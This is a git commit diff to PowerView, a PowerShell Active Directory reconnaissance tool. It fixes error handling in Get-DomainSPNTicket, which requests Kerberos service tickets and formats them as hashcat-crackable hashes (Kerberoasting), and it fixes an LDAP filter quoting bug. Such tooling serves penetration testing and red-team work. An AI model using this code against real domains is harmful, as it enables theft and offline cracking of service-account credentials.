Couple of fixes for Get-DomainSPNTicket

HarmJ0y · HarmJ0y · commit 9ea5c5b7f5b0 · 2017-01-10T18:31:30.000-05:00
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1
@@ -2296,8 +2296,8 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
             }
             else {
                 $UserSPN = $Object
-                $SamAccountName = $Null
-                $DistinguishedName = $Null
+                $SamAccountName = 'UNKNOWN'
+                $DistinguishedName = 'UNKNOWN'
             }
 
             # if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3
@@ -2309,7 +2309,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                 $Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
             }
             catch {
-                Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName'"
+                Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"
             }
             if ($Ticket) {
                 $TicketByteStream = $Ticket.GetRequest()
@@ -2330,15 +2330,19 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and
                     $HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
                 }
                 else {
-                    $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                    if ($DistinguishedName -ne 'UNKNOWN') {
+                        $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+                    }
+                    else {
+                        $UserDomain = 'UNKNOWN'
+                    }
 
                     # hashcat output format
                     $HashFormat = "`$krb5tgs`$23`$*$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)*`$$Hash"
                 }
                 $Out | Add-Member Noteproperty 'Hash' $HashFormat
                 $Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
                 Write-Output $Out
-                break
             }
         }
     }
@@ -5785,7 +5789,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
             }
             if ($PSBoundParameters['SPN']) {
                 Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN"
-                $Filter += '(servicePrincipalName=$SPN)'
+                $Filter += "(servicePrincipalName=$SPN)"
             }
             if ($PSBoundParameters['OperatingSystem']) {
                 Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem"

Original file line number	Diff line number	Diff line change
`@@ -2296,8 +2296,8 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and`
`2296`	`2296`	`}`
`2297`	`2297`	`else {`
`2298`	`2298`	`$UserSPN = $Object`
`2299`		`- $SamAccountName = $Null`
`2300`		`- $DistinguishedName = $Null`
	`2299`	`+ $SamAccountName = 'UNKNOWN'`
	`2300`	`+ $DistinguishedName = 'UNKNOWN'`
`2301`	`2301`	`}`
`2302`	`2302`
`2303`	`2303`	`# if a user has multiple SPNs we only take the first one otherwise the service ticket request fails miserably :) -@st3r30byt3`
`@@ -2309,7 +2309,7 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and`
`2309`	`2309`	`$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN`
`2310`	`2310`	`}`
`2311`	`2311`	`catch {`
`2312`		`- Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName'"`
	`2312`	`+ Write-Warning "[Get-DomainSPNTicket] Error requesting ticket for SPN '$UserSPN' from user '$DistinguishedName' : $_"`
`2313`	`2313`	`}`
`2314`	`2314`	`if ($Ticket) {`
`2315`	`2315`	`$TicketByteStream = $Ticket.GetRequest()`
`@@ -2330,15 +2330,19 @@ Outputs a custom object containing the SamAccountName, ServicePrincipalName, and`
`2330`	`2330`	$HashFormat = "`$krb5tgs`$$($Ticket.ServicePrincipalName):$Hash"
`2331`	`2331`	`}`
`2332`	`2332`	`else {`
`2333`		`- $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'`
	`2333`	`+ if ($DistinguishedName -ne 'UNKNOWN') {`
	`2334`	`+ $UserDomain = $DistinguishedName.SubString($DistinguishedName.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'`
	`2335`	`+ }`
	`2336`	`+ else {`
	`2337`	`+ $UserDomain = 'UNKNOWN'`
	`2338`	`+ }`
`2334`	`2339`
`2335`	`2340`	`# hashcat output format`
`2336`	`2341`	$HashFormat = "`$krb5tgs`$23`$$SamAccountName`$$UserDomain`$$($Ticket.ServicePrincipalName)`$$Hash"
`2337`	`2342`	`}`
`2338`	`2343`	`$Out \| Add-Member Noteproperty 'Hash' $HashFormat`
`2339`	`2344`	`$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')`
`2340`	`2345`	`Write-Output $Out`
`2341`		`- break`
`2342`	`2346`	`}`
`2343`	`2347`	`}`
`2344`	`2348`	`}`
`@@ -5785,7 +5789,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.`
`5785`	`5789`	`}`
`5786`	`5790`	`if ($PSBoundParameters['SPN']) {`
`5787`	`5791`	`Write-Verbose "[Get-DomainComputer] Searching for computers with SPN: $SPN"`
`5788`		`- $Filter += '(servicePrincipalName=$SPN)'`
	`5792`	`+ $Filter += "(servicePrincipalName=$SPN)"`
`5789`	`5793`	`}`
`5790`	`5794`	`if ($PSBoundParameters['OperatingSystem']) {`
`5791`	`5795`	`Write-Verbose "[Get-DomainComputer] Searching for computers with operating system: $OperatingSystem"`